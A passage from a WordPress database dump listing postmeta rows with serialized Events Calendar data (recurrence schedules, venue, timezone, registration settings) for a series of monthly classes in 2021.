20:00:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(119490,262746,'_tribe_modified_fields','a:23:{s:12:\"_EventOrigin\";i:1608114199;s:24:\"boldgrid_hide_page_title\";i:1608114199;s:16:\"_EventRecurrence\";i:1608114199;s:17:\"_EventShowMapLink\";i:1608114199;s:13:\"_EventShowMap\";i:1608114199;s:20:\"_EventCurrencySymbol\";i:1608114199;s:22:\"_EventCurrencyPosition\";i:1608114199;s:10:\"_EventCost\";i:1608114199;s:9:\"_EventURL\";i:1608114199;s:14:\"_EventTimezone\";i:1608114199;s:27:\"_EventNextPendingRecurrence\";i:1608114199;s:12:\"_dp_original\";i:1608114199;s:16:\"protect_children\";i:1608114199;s:26:\"_RTECregistrationsDisabled\";i:1608114199;s:17:\"_RTECdeadlineType\";i:1608114199;s:19:\"_RTECwhoCanRegister\";i:1608114199;s:23:\"_RTEClimitRegistrations\";i:1608114199;s:21:\"_RTECmaxRegistrations\";i:1608114199;s:13:\"_thumbnail_id\";i:1608114199;s:13:\"_EventVenueID\";i:1608114199;s:12:\"_wp_old_slug\";i:1608114199;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1608114199;s:16:\"tribe_events_cat\";i:1608139399;}'),(119491,262746,'_tribe_modified_fields','a:23:{s:12:\"_EventOrigin\";i:1608114199;s:24:\"boldgrid_hide_page_title\";i:1608114199;s:16:\"_EventRecurrence\";i:1608114199;s:17:\"_EventShowMapLink\";i:1608114199;s:13:\"_EventShowMap\";i:1608114199;s:20:\"_EventCurrencySymbol\";i:1608114199;s:22:\"_EventCurrencyPosition\";i:1608114199;s:10:\"_EventCost\";i:1608114199;s:9:\"_EventURL\";i:1608114199;s:14:\"_EventTimezone\";i:1608114199;s:27:\"_EventNextPendingRecurrence\";i:1608114199;s:12:\"_dp_original\";i:1608114199;s:16:\"protect_children\";i:1608114199;s:26:\"_RTECregistrationsDisabled\";i:1608114199;s:17:\"_RTECdeadlineType\";i:1608114199;s:19:\"_RTECwhoCanRegister\";i:1608114199;s:23:\"_RTEClimitRegistrations\";i:1608114199;s:21:\"_RTECmaxRegistrations\";i:1608114199;s:13:\"_thumbnail_id\";i:1608114199;s:13:\"_EventVenueID\";i:1608114199;s:12:\"_wp_old_slug\";i:1608114199;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1608114199;s:16:\"tribe_events_cat\";i:1608139399;}'),(119497,262746,'_EventShowMapLink','1'),(119498,262746,'_EventShowMap','1'),(119499,262746,'_EventCurrencySymbol',''),(119500,262746,'_EventCurrencyPosition','prefix'),(119501,262746,'_EventCost',''),(119515,262746,'_wp_old_slug','letters-of-light-and-sound-1-2'),(119502,262746,'_EventURL',''),(119503,262746,'_EventTimezone','America/Denver'),(119504,262746,'_EventNextPendingRecurrence','2022-01-11 19:00:00'),(119505,262746,'_dp_original','225321'),(119506,262746,'protect_children',''),(119507,262746,'_RTECregistrationsDisabled','1'),(119494,262746,'_tribe_modified_fields','a:23:{s:12:\"_EventOrigin\";i:1608114199;s:24:\"boldgrid_hide_page_title\";i:1608114199;s:16:\"_EventRecurrence\";i:1608114199;s:17:\"_EventShowMapLink\";i:1608114199;s:13:\"_EventShowMap\";i:1608114199;s:20:\"_EventCurrencySymbol\";i:1608114199;s:22:\"_EventCurrencyPosition\";i:1608114199;s:10:\"_EventCost\";i:1608114199;s:9:\"_EventURL\";i:1608114199;s:14:\"_EventTimezone\";i:1608114199;s:27:\"_EventNextPendingRecurrence\";i:1608114199;s:12:\"_dp_original\";i:1608114199;s:16:\"protect_children\";i:1608114199;s:26:\"_RTECregistrationsDisabled\";i:1608114199;s:17:\"_RTECdeadlineType\";i:1608114199;s:19:\"_RTECwhoCanRegister\";i:1608114199;s:23:\"_RTEClimitRegistrations\";i:1608114199;s:21:\"_RTECmaxRegistrations\";i:1608114199;s:13:\"_thumbnail_id\";i:1608114199;s:13:\"_EventVenueID\";i:1608114199;s:12:\"_wp_old_slug\";i:1608114199;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1608114199;s:16:\"tribe_events_cat\";i:1608139399;}'),(119508,262746,'_RTECdeadlineType','start'),(119509,262746,'_RTECwhoCanRegister','any'),(119510,262746,'_RTEClimitRegistrations','0'),(119511,262746,'_RTECmaxRegistrations','30'),(119516,262746,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:0:{}s:6:\"update\";a:9:{i:262743;a:2:{s:9:\"timestamp\";i:1612897200;s:8:\"duration\";i:3600;}i:262744;a:2:{s:9:\"timestamp\";i:1615316400;s:8:\"duration\";i:3600;}i:262745;a:2:{s:9:\"timestamp\";i:1618340400;s:8:\"duration\";i:3600;}i:262746;a:2:{s:9:\"timestamp\";i:1620759600;s:8:\"duration\";i:3600;}i:262747;a:2:{s:9:\"timestamp\";i:1623178800;s:8:\"duration\";i:3600;}i:262748;a:2:{s:9:\"timestamp\";i:1626202800;s:8:\"duration\";i:3600;}i:262749;a:2:{s:9:\"timestamp\";i:1628622000;s:8:\"duration\";i:3600;}i:262750;a:2:{s:9:\"timestamp\";i:1631646000;s:8:\"duration\";i:3600;}i:262751;a:2:{s:9:\"timestamp\";i:1634065200;s:8:\"duration\";i:3600;}}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:9;}'),(151785,266078,'_dp_original','265927'),(119513,262746,'_EventVenueID','262507'),(119514,262746,'_wp_old_slug','boulder-easy-way-class'),(119493,262746,'_tribe_modified_fields','a:23:{s:12:\"_EventOrigin\";i:1608114199;s:24:\"boldgrid_hide_page_title\";i:1608114199;s:16:\"_EventRecurrence\";i:1608114199;s:17:\"_EventShowMapLink\";i:1608114199;s:13:\"_EventShowMap\";i:1608114199;s:20:\"_EventCurrencySymbol\";i:1608114199;s:22:\"_EventCurrencyPosition\";i:1608114199;s:10:\"_EventCost\";i:1608114199;s:9:\"_EventURL\";i:1608114199;s:14:\"_EventTimezone\";i:1608114199;s:27:\"_EventNextPendingRecurrence\";i:1608114199;s:12:\"_dp_original\";i:1608114199;s:16:\"protect_children\";i:1608114199;s:26:\"_RTECregistrationsDisabled\";i:1608114199;s:17:\"_RTECdeadlineType\";i:1608114199;s:19:\"_RTECwhoCanRegister\";i:1608114199;s:23:\"_RTEClimitRegistrations\";i:1608114199;s:21:\"_RTECmaxRegistrations\";i:1608114199;s:13:\"_thumbnail_id\";i:1608114199;s:13:\"_EventVenueID\";i:1608114199;s:12:\"_wp_old_slug\";i:1608114199;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1608114199;s:16:\"tribe_events_cat\";i:1608139399;}'),(119492,262746,'_tribe_modified_fields','a:23:{s:12:\"_EventOrigin\";i:1608114199;s:24:\"boldgrid_hide_page_title\";i:1608114199;s:16:\"_EventRecurrence\";i:1608114199;s:17:\"_EventShowMapLink\";i:1608114199;s:13:\"_EventShowMap\";i:1608114199;s:20:\"_EventCurrencySymbol\";i:1608114199;s:22:\"_EventCurrencyPosition\";i:1608114199;s:10:\"_EventCost\";i:1608114199;s:9:\"_EventURL\";i:1608114199;s:14:\"_EventTimezone\";i:1608114199;s:27:\"_EventNextPendingRecurrence\";i:1608114199;s:12:\"_dp_original\";i:1608114199;s:16:\"protect_children\";i:1608114199;s:26:\"_RTECregistrationsDisabled\";i:1608114199;s:17:\"_RTECdeadlineType\";i:1608114199;s:19:\"_RTECwhoCanRegister\";i:1608114199;s:23:\"_RTEClimitRegistrations\";i:1608114199;s:21:\"_RTECmaxRegistrations\";i:1608114199;s:13:\"_thumbnail_id\";i:1608114199;s:13:\"_EventVenueID\";i:1608114199;s:12:\"_wp_old_slug\";i:1608114199;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1608114199;s:16:\"tribe_events_cat\";i:1608139399;}'),(119483,262746,'_EventOrigin','events-calendar'),(119484,262746,'_EventOrigin','events-calendar'),(119485,262746,'_EventOrigin','events-calendar'),(119486,262746,'_EventOrigin','events-calendar'),(119487,262746,'_EventOrigin','events-calendar'),(119488,262746,'_EventOrigin','events-calendar'),(119489,262746,'_tribe_modified_fields','a:23:{s:12:\"_EventOrigin\";i:1608114199;s:24:\"boldgrid_hide_page_title\";i:1608114199;s:16:\"_EventRecurrence\";i:1608114199;s:17:\"_EventShowMapLink\";i:1608114199;s:13:\"_EventShowMap\";i:1608114199;s:20:\"_EventCurrencySymbol\";i:1608114199;s:22:\"_EventCurrencyPosition\";i:1608114199;s:10:\"_EventCost\";i:1608114199;s:9:\"_EventURL\";i:1608114199;s:14:\"_EventTimezone\";i:1608114199;s:27:\"_EventNextPendingRecurrence\";i:1608114199;s:12:\"_dp_original\";i:1608114199;s:16:\"protect_children\";i:1608114199;s:26:\"_RTECregistrationsDisabled\";i:1608114199;s:17:\"_RTECdeadlineType\";i:1608114199;s:19:\"_RTECwhoCanRegister\";i:1608114199;s:23:\"_RTEClimitRegistrations\";i:1608114199;s:21:\"_RTECmaxRegistrations\";i:1608114199;s:13:\"_thumbnail_id\";i:1608114199;s:13:\"_EventVenueID\";i:1608114199;s:12:\"_wp_old_slug\";i:1608114199;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1608114199;s:16:\"tribe_events_cat\";i:1608139399;}'),(119482,262746,'_tribe_modified_fields','a:23:{s:12:\"_EventOrigin\";i:1608114199;s:24:\"boldgrid_hide_page_title\";i:1608114199;s:16:\"_EventRecurrence\";i:1608114199;s:17:\"_EventShowMapLink\";i:1608114199;s:13:\"_EventShowMap\";i:1608114199;s:20:\"_EventCurrencySymbol\";i:1608114199;s:22:\"_EventCurrencyPosition\";i:1608114199;s:10:\"_EventCost\";i:1608114199;s:9:\"_EventURL\";i:1608114199;s:14:\"_EventTimezone\";i:1608114199;s:27:\"_EventNextPendingRecurrence\";i:1608114199;s:12:\"_dp_original\";i:1608114199;s:16:\"protect_children\";i:1608114199;s:26:\"_RTECregistrationsDisabled\";i:1608114199;s:17:\"_RTECdeadlineType\";i:1608114199;s:19:\"_RTECwhoCanRegister\";i:1608114199;s:23:\"_RTEClimitRegistrations\";i:1608114199;s:21:\"_RTECmaxRegistrations\";i:1608114199;s:13:\"_thumbnail_id\";i:1608114199;s:13:\"_EventVenueID\";i:1608114199;s:12:\"_wp_old_slug\";i:1608114199;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1608114199;s:16:\"tribe_events_cat\";i:1608139399;}'),(112883,262747,'_EventStartDate','2021-06-08 19:00:00'),(112884,262747,'_EventStartDateUTC','2021-06-09 01:00:00'),(112885,262747,'_EventEndDate','2021-06-08 20:00:00'),(112886,262747,'_EventEndDateUTC','2021-06-09 02:00:00'),(112887,262747,'_EventDuration','3600'),(119534,262747,'_EventCurrencySymbol',''),(119535,262747,'_EventCurrencyPosition','prefix'),(119536,262747,'_EventCost',''),(119537,262747,'_EventURL',''),(119538,262747,'_EventTimezone','America/Denver'),(119527,262747,'_tribe_modified_fields','a:23:{s:12:\"_EventOrigin\";i:1608114199;s:24:\"boldgrid_hide_page_title\";i:1608114199;s:16:\"_EventRecurrence\";i:1608114199;s:17:\"_EventShowMapLink\";i:1608114199;s:13:\"_EventShowMap\";i:1608114199;s:20:\"_EventCurrencySymbol\";i:1608114199;s:22:\"_EventCurrencyPosition\";i:1608114199;s:10:\"_EventCost\";i:1608114199;s:9:\"_EventURL\";i:1608114199;s:14:\"_EventTimezone\";i:1608114199;s:27:\"_EventNextPendingRecurrence\";i:1608114199;s:12:\"_dp_original\";i:1608114199;s:16:\"protect_children\";i:1608114199;s:26:\"_RTECregistrationsDisabled\";i:1608114199;s:17:\"_RTECdeadlineType\";i:1608114199;s:19:\"_RTECwhoCanRegister\";i:1608114199;s:23:\"_RTEClimitRegistrations\";i:1608114199;s:21:\"_RTECmaxRegistrations\";i:1608114199;s:13:\"_thumbnail_id\";i:1608114199;s:13:\"_EventVenueID\";i:1608114199;s:12:\"_wp_old_slug\";i:1608114199;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1608114199;s:16:\"tribe_events_cat\";i:1608139399;}'),(119532,262747,'_EventShowMapLink','1'),(119533,262747,'_EventShowMap','1'),(119543,262747,'_RTECdeadlineType','start'),(119544,262747,'_RTECwhoCanRegister','any'),(119545,262747,'_RTEClimitRegistrations','0'),(119546,262747,'_RTECmaxRegistrations','30'),(119528,262747,'_tribe_modified_fields','a:23:{s:12:\"_EventOrigin\";i:1608114199;s:24:\"boldgrid_hide_page_title\";i:1608114199;s:16:\"_EventRecurrence\";i:1608114199;s:17:\"_EventShowMapLink\";i:1608114199;s:13:\"_EventShowMap\";i:1608114199;s:20:\"_EventCurrencySymbol\";i:1608114199;s:22:\"_EventCurrencyPosition\";i:1608114199;s:10:\"_EventCost\";i:1608114199;s:9:\"_EventURL\";i:1608114199;s:14:\"_EventTimezone\";i:1608114199;s:27:\"_EventNextPendingRecurrence\";i:1608114199;s:12:\"_dp_original\";i:1608114199;s:16:\"protect_children\";i:1608114199;s:26:\"_RTECregistrationsDisabled\";i:1608114199;s:17:\"_RTECdeadlineType\";i:1608114199;s:19:\"_RTECwhoCanRegister\";i:1608114199;s:23:\"_RTEClimitRegistrations\";i:1608114199;s:21:\"_RTECmaxRegistrations\";i:1608114199;s:13:\"_thumbnail_id\";i:1608114199;s:13:\"_EventVenueID\";i:1608114199;s:12:\"_wp_old_slug\";i:1608114199;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1608114199;s:16:\"tribe_events_cat\";i:1608139399;}'),(119548,262747,'_EventVenueID','262507'),(119549,262747,'_wp_old_slug','boulder-easy-way-class'),(119550,262747,'_wp_old_slug','letters-of-light-and-sound-1-2'),(119551,262747,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:0:{}s:6:\"update\";a:9:{i:262743;a:2:{s:9:\"timestamp\";i:1612897200;s:8:\"duration\";i:3600;}i:262744;a:2:{s:9:\"timestamp\";i:1615316400;s:8:\"duration\";i:3600;}i:262745;a:2:{s:9:\"timestamp\";i:1618340400;s:8:\"duration\";i:3600;}i:262746;a:2:{s:9:\"timestamp\";i:1620759600;s:8:\"duration\";i:3600;}i:262747;a:2:{s:9:\"timestamp\";i:1623178800;s:8:\"duration\";i:3600;}i:262748;a:2:{s:9:\"timestamp\";i:1626202800;s:8:\"duration\";i:3600;}i:262749;a:2:{s:9:\"timestamp\";i:1628622000;s:8:\"duration\";i:3600;}i:262750;a:2:{s:9:\"timestamp\";i:1631646000;s:8:\"duration\";i:3600;}i:262751;a:2:{s:9:\"timestamp\";i:1634065200;s:8:\"duration\";i:3600;}}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:9;}'),(119529,262747,'_tribe_modified_fields','a:23:{s:12:\"_EventOrigin\";i:1608114199;s:24:\"boldgrid_hide_page_title\";i:1608114199;s:16:\"_EventRecurrence\";i:1608114199;s:17:\"_EventShowMapLink\";i:1608114199;s:13:\"_EventShowMap\";i:1608114199;s:20:\"_EventCurrencySymbol\";i:1608114199;s:22:\"_EventCurrencyPosition\";i:1608114199;s:10:\"_EventCost\";i:1608114199;s:9:\"_EventURL\";i:1608114199;s:14:\"_EventTimezone\";i:1608114199;s:27:\"_EventNextPendingRecurrence\";i:1608114199;s:12:\"_dp_original\";i:1608114199;s:16:\"protect_children\";i:1608114199;s:26:\"_RTECregistrationsDisabled\";i:1608114199;s:17:\"_RTECdeadlineType\";i:1608114199;s:19:\"_RTECwhoCanRegister\";i:1608114199;s:23:\"_RTEClimitRegistrations\";i:1608114199;s:21:\"_RTECmaxRegistrations\";i:1608114199;s:13:\"_thumbnail_id\";i:1608114199;s:13:\"_EventVenueID\";i:1608114199;s:12:\"_wp_old_slug\";i:1608114199;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1608114199;s:16:\"tribe_events_cat\";i:1608139399;}'),(119526,262747,'_tribe_modified_fields','a:23:{s:12:\"_EventOrigin\";i:1608114199;s:24:\"boldgrid_hide_page_title\";i:1608114199;s:16:\"_EventRecurrence\";i:1608114199;s:17:\"_EventShowMapLink\";i:1608114199;s:13:\"_EventShowMap\";i:1608114199;s:20:\"_EventCurrencySymbol\";i:1608114199;s:22:\"_EventCurrencyPosition\";i:1608114199;s:10:\"_EventCost\";i:1608114199;s:9:\"_EventURL\";i:1608114199;s:14:\"_EventTimezone\";i:1608114199;s:27:\"_EventNextPendingRecurrence\";i:1608114199;s:12:\"_dp_original\";i:1608114199;s:16:\"protect_children\";i:1608114199;s:26:\"_RTECregistrationsDisabled\";i:1608114199;s:17:\"_RTECdeadlineType\";i:1608114199;s:19:\"_RTECwhoCanRegister\";i:1608114199;s:23:\"_RTEClimitRegistrations\";i:1608114199;s:21:\"_RTECmaxRegistrations\";i:1608114199;s:13:\"_thumbnail_id\";i:1608114199;s:13:\"_EventVenueID\";i:1608114199;s:12:\"_wp_old_slug\";i:1608114199;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1608114199;s:16:\"tribe_events_cat\";i:1608139399;}'),(112799,262745,'_EventEndDate','2021-04-13 20:00:00'),(112800,262745,'_EventEndDateUTC','2021-04-14 02:00:00'),(112801,262745,'_EventDuration','3600'),(119457,262745,'_tribe_modified_fields','a:23:{s:12:\"_EventOrigin\";i:1608114199;s:24:\"boldgrid_hide_page_title\";i:1608114199;s:16:\"_EventRecurrence\";i:1608114199;s:17:\"_EventShowMapLink\";i:1608114199;s:13:\"_EventShowMap\";i:1608114199;s:20:\"_EventCurrencySymbol\";i:1608114199;s:22:\"_EventCurrencyPosition\";i:1608114199;s:10:\"_EventCost\";i:1608114199;s:9:\"_EventURL\";i:1608114199;s:14:\"_EventTimezone\";i:1608114199;s:27:\"_EventNextPendingRecurrence\";i:1608114199;s:12:\"_dp_original\";i:1608114199;s:16:\"protect_children\";i:1608114199;s:26:\"_RTECregistrationsDisabled\";i:1608114199;s:17:\"_RTECdeadlineType\";i:1608114199;s:19:\"_RTECwhoCanRegister\";i:1608114199;s:23:\"_RTEClimitRegistrations\";i:1608114199;s:21:\"_RTECmaxRegistrations\";i:1608114199;s:13:\"_thumbnail_id\";i:1608114199;s:13:\"_EventVenueID\";i:1608114199;s:12:\"_wp_old_slug\";i:1608114199;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1608114199;s:16:\"tribe_events_cat\";i:1608139399;}'),(119465,262745,'_EventCurrencyPosition','prefix'),(119462,262745,'_EventShowMapLink','1'),(119539,262747,'_EventNextPendingRecurrence','2022-01-11 19:00:00'),(119540,262747,'_dp_original','225321'),(119541,262747,'protect_children',''),(119542,262747,'_RTECregistrationsDisabled','1'),(119409,262743,'_wp_old_slug','boulder-easy-way-class'),(119410,262743,'_wp_old_slug','letters-of-light-and-sound-1-2'),(119438,262744,'_RTECdeadlineType','start'),(119439,262744,'_RTECwhoCanRegister','any'),(119440,262744,'_RTEClimitRegistrations','0'),(119441,262744,'_RTECmaxRegistrations','30'),(151787,266078,'_edit_last','2'),(119443,262744,'_EventVenueID','262507'),(119444,262744,'_wp_old_slug','boulder-easy-way-class'),(119391,262743,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:6:\"Second\";s:3:\"day\";s:1:\"2\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-10-17\";s:14:\"EventStartDate\";s:19:\"2021-01-12 19:00:00\";s:12:\"EventEndDate\";s:19:\"2021-01-12 20:00:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(119390,262743,'boldgrid_hide_page_title','1'),(119392,262743,'_EventShowMapLink','1'),(119393,262743,'_EventShowMap','1'),(119394,262743,'_EventCurrencySymbol',''),(119395,262743,'_EventCurrencyPosition','prefix'),(119396,262743,'_EventCost',''),(119397,262743,'_EventURL',''),(119385,262743,'_tribe_modified_fields','a:23:{s:12:\"_EventOrigin\";i:1608114199;s:24:\"boldgrid_hide_page_title\";i:1608114199;s:16:\"_EventRecurrence\";i:1608114199;s:17:\"_EventShowMapLink\";i:1608114199;s:13:\"_EventShowMap\";i:1608114199;s:20:\"_EventCurrencySymbol\";i:1608114199;s:22:\"_EventCurrencyPosition\";i:1608114199;s:10:\"_EventCost\";i:1608114199;s:9:\"_EventURL\";i:1608114199;s:14:\"_EventTimezone\";i:1608114199;s:27:\"_EventNextPendingRecurrence\";i:1608114199;s:12:\"_dp_original\";i:1608114199;s:16:\"protect_children\";i:1608114199;s:26:\"_RTECregistrationsDisabled\";i:1608114199;s:17:\"_RTECdeadlineType\";i:1608114199;s:19:\"_RTECwhoCanRegister\";i:1608114199;s:23:\"_RTEClimitRegistrations\";i:1608114199;s:21:\"_RTECmaxRegistrations\";i:1608114199;s:13:\"_thumbnail_id\";i:1608114199;s:13:\"_EventVenueID\";i:1608114199;s:12:\"_wp_old_slug\";i:1608114199;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1608114199;s:16:\"tribe_events_cat\";i:1608139399;}'),(119386,262743,'_tribe_modified_fields','a:23:{s:12:\"_EventOrigin\";i:1608114199;s:24:\"boldgrid_hide_page_title\";i:1608114199;s:16:\"_EventRecurrence\";i:1608114199;s:17:\"_EventShowMapLink\";i:1608114199;s:13:\"_EventShowMap\";i:1608114199;s:20:\"_EventCurrencySymbol\";i:1608114199;s:22:\"_EventCurrencyPosition\";i:1608114199;s:10:\"_EventCost\";i:1608114199;s:9:\"_EventURL\";i:1608114199;s:14:\"_EventTimezone\";i:1608114199;s:27:\"_EventNextPendingRecurrence\";i:1608114199;s:12:\"_dp_original\";i:1608114199;s:16:\"protect_children\";i:1608114199;s:26:\"_RTECregistrationsDisabled\";i:1608114199;s:17:\"_RTECdeadlineType\";i:1608114199;s:19:\"_RTECwhoCanRegister\";i:1608114199;s:23:\"_RTEClimitRegistrations\";i:1608114199;s:21:\"_RTECmaxRegistrations\";i:1608114199;s:13:\"_thumbnail_id\";i:1608114199;s:13:\"_EventVenueID\";i:1608114199;s:12:\"_wp_old_slug\";i:1608114199;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1608114199;s:16:\"tribe_events_cat\";i:1608139399;}'),(119398,262743,'_EventTimezone','America/Denver'),(119399,262743,'_EventNextPendingRecurrence','2022-01-11 19:00:00'),(119400,262743,'_dp_original','225321'),(119401,262743,'protect_children',''),(119388,262743,'_tribe_modified_fields','a:23:{s:12:\"_EventOrigin\";i:1608114199;s:24:\"boldgrid_hide_page_title\";i:1608114199;s:16:\"_EventRecurrence\";i:1608114199;s:17:\"_EventShowMapLink\";i:1608114199;s:13:\"_EventShowMap\";i:1608114199;s:20:\"_EventCurrencySymbol\";i:1608114199;s:22:\"_EventCurrencyPosition\";i:1608114199;s:10:\"_EventCost\";i:1608114199;s:9:\"_EventURL\";i:1608114199;s:14:\"_EventTimezone\";i:1608114199;s:27:\"_EventNextPendingRecurrence\";i:1608114199;s:12:\"_dp_original\";i:1608114199;s:16:\"protect_children\";i:1608114199;s:26:\"_RTECregistrationsDisabled\";i:1608114199;s:17:\"_RTECdeadlineType\";i:1608114199;s:19:\"_RTECwhoCanRegister\";i:1608114199;s:23:\"_RTEClimitRegistrations\";i:1608114199;s:21:\"_RTECmaxRegistrations\";i:1608114199;s:13:\"_thumbnail_id\";i:1608114199;s:13:\"_EventVenueID\";i:1608114199;s:12:\"_wp_old_slug\";i:1608114199;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1608114199;s:16:\"tribe_events_cat\";i:1608139399;}'),(119402,262743,'_RTECregistrationsDisabled','1'),(119403,262743,'_RTECdeadlineType','start'),(119404,262743,'_RTECwhoCanRegister','any'),(119405,262743,'_RTEClimitRegistrations','0'),(119406,262743,'_RTECmaxRegistrations','30'),(151788,266079,'_wp_attached_file','2021/12/greek-ruin-1.jpg'),(119387,262743,'_tribe_modified_fields','a:23:{s:12:\"_EventOrigin\";i:1608114199;s:24:\"boldgrid_hide_page_title\";i:1608114199;s:16:\"_EventRecurrence\";i:1608114199;s:17:\"_EventShowMapLink\";i:1608114199;s:13:\"_EventShowMap\";i:1608114199;s:20:\"_EventCurrencySymbol\";i:1608114199;s:22:\"_EventCurrencyPosition\";i:1608114199;s:10:\"_EventCost\";i:1608114199;s:9:\"_EventURL\";i:1608114199;s:14:\"_EventTimezone\";i:1608114199;s:27:\"_EventNextPendingRecurrence\";i:1608114199;s:12:\"_dp_original\";i:1608114199;s:16:\"protect_children\";i:1608114199;s:26:\"_RTECregistrationsDisabled\";i:1608114199;s:17:\"_RTECdeadlineType\";i:1608114199;s:19:\"_RTECwhoCanRegister\";i:1608114199;s:23:\"_RTEClimitRegistrations\";i:1608114199;s:21:\"_RTECmaxRegistrations\";i:1608114199;s:13:\"_thumbnail_id\";i:1608114199;s:13:\"_EventVenueID\";i:1608114199;s:12:\"_wp_old_slug\";i:1608114199;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1608114199;s:16:\"tribe_events_cat\";i:1608139399;}'),(119378,262743,'_EventOrigin','events-calendar'),(119379,262743,'_EventOrigin','events-calendar'),(119380,262743,'_EventOrigin','events-calendar'),(119381,262743,'_EventOrigin','events-calendar'),(119382,262743,'_EventOrigin','events-calendar'),(119383,262743,'_EventOrigin','events-calendar'),(119384,262743,'_tribe_modified_fields','a:23:{s:12:\"_EventOrigin\";i:1608114199;s:24:\"boldgrid_hide_page_title\";i:1608114199;s:16:\"_EventRecurrence\";i:1608114199;s:17:\"_EventShowMapLink\";i:1608114199;s:13:\"_EventShowMap\";i:1608114199;s:20:\"_EventCurrencySymbol\";i:1608114199;s:22:\"_EventCurrencyPosition\";i:1608114199;s:10:\"_EventCost\";i:1608114199;s:9:\"_EventURL\";i:1608114199;s:14:\"_EventTimezone\";i:1608114199;s:27:\"_EventNextPendingRecurrence\";i:1608114199;s:12:\"_dp_original\";i:1608114199;s:16:\"protect_children\";i:1608114199;s:26:\"_RTECregistrationsDisabled\";i:1608114199;s:17:\"_RTECdeadlineType\";i:1608114199;s:19:\"_RTECwhoCanRegister\";i:1608114199;s:23:\"_RTEClimitRegistrations\";i:1608114199;s:21:\"_RTECmaxRegistrations\";i:1608114199;s:13:\"_thumbnail_id\";i:1608114199;s:13:\"_EventVenueID\";i:1608114199;s:12:\"_wp_old_slug\";i:1608114199;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1608114199;s:16:\"tribe_events_cat\";i:1608139399;}'),(119377,262743,'_tribe_modified_fields','a:23:{s:12:\"_EventOrigin\";i:1608114199;s:24:\"boldgrid_hide_page_title\";i:1608114199;s:16:\"_EventRecurrence\";i:1608114199;s:17:\"_EventShowMapLink\";i:1608114199;s:13:\"_EventShowMap\";i:1608114199;s:20:\"_EventCurrencySymbol\";i:1608114199;s:22:\"_EventCurrencyPosition\";i:1608114199;s:10:\"_EventCost\";i:1608114199;s:9:\"_EventURL\";i:1608114199;s:14:\"_EventTimezone\";i:1608114199;s:27:\"_EventNextPendingRecurrence\";i:1608114199;s:12:\"_dp_original\";i:1608114199;s:16:\"protect_children\";i:1608114199;s:26:\"_RTECregistrationsDisabled\";i:1608114199;s:17:\"_RTECdeadlineType\";i:1608114199;s:19:\"_RTECwhoCanRegister\";i:1608114199;s:23:\"_RTEClimitRegistrations\";i:1608114199;s:21:\"_RTECmaxRegistrations\";i:1608114199;s:13:\"_thumbnail_id\";i:1608114199;s:13:\"_EventVenueID\";i:1608114199;s:12:\"_wp_old_slug\";i:1608114199;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1608114199;s:16:\"tribe_events_cat\";i:1608139399;}'),(112798,262745,'_EventStartDateUTC','2021-04-14 01:00:00'),(112754,262744,'_EventStartDate','2021-03-09 19:00:00'),(112755,262744,'_EventStartDateUTC','2021-03-10 02:00:00'),(112756,262744,'_EventEndDate','2021-03-09 20:00:00'),(112757,262744,'_EventEndDateUTC','2021-03-10 03:00:00'),(119710,262989,'protect_children',''),(112758,262744,'_EventDuration','3600'),(112034,225786,'_wp_old_slug','boulder-easy-way-class'),(112386,225018,'_wp_old_slug','soul-travel-2-class'),(119463,262745,'_EventShowMap','1'),(119464,262745,'_EventCurrencySymbol',''),(119466,262745,'_EventCost',''),(119467,262745,'_EventURL',''),(119468,262745,'_EventTimezone','America/Denver'),(119469,262745,'_EventNextPendingRecurrence','2022-01-11 19:00:00'),(119481,262745,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:0:{}s:6:\"update\";a:9:{i:262743;a:2:{s:9:\"timestamp\";i:1612897200;s:8:\"duration\";i:3600;}i:262744;a:2:{s:9:\"timestamp\";i:1615316400;s:8:\"duration\";i:3600;}i:262745;a:2:{s:9:\"timestamp\";i:1618340400;s:8:\"duration\";i:3600;}i:262746;a:2:{s:9:\"timestamp\";i:1620759600;s:8:\"duration\";i:3600;}i:262747;a:2:{s:9:\"timestamp\";i:1623178800;s:8:\"duration\";i:3600;}i:262748;a:2:{s:9:\"timestamp\";i:1626202800;s:8:\"duration\";i:3600;}i:262749;a:2:{s:9:\"timestamp\";i:1628622000;s:8:\"duration\";i:3600;}i:262750;a:2:{s:9:\"timestamp\";i:1631646000;s:8:\"duration\";i:3600;}i:262751;a:2:{s:9:\"timestamp\";i:1634065200;s:8:\"duration\";i:3600;}}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:9;}'),(119470,262745,'_dp_original','225321'),(119471,262745,'protect_children',''),(119472,262745,'_RTECregistrationsDisabled','1'),(119479,262745,'_wp_old_slug','boulder-easy-way-class'),(119480,262745,'_wp_old_slug','letters-of-